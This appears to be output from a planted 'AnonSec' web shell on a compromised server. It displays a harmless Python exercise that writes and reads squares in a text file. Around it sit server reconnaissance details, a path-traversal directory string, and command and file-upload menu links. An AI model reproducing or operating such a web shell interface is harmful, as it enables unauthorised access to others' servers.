AnonSec Team
Server IP : 10.128.40.6  /  Your IP : 216.73.217.62
Web Server : Apache
System : Linux webd006.cluster128.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : logmcpe ( 111175)
PHP Version : 7.3.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/logmcpe/MC/../www/mcg/plugins/jszip/../../.github/../sms/../pages/python/python 2/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/logmcpe/MC/../www/mcg/plugins/jszip/../../.github/../sms/../pages/python/python 2/tp_open.py
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 13 19:29:45 2022

@author: pro
"""
lis = []
with open('tp.txt','w') as f :
    for i in range(10):
        f.write('{}^2 = {} \n'.format(i, i*i))
        
with open('tp.txt', 'r') as f : 
#    print(f.read())
    a=f.readlines()
    for i in a:
        lis.append(i.strip())
        print("--",i)

print("la liste ")
print(lis)

AnonSec - 2021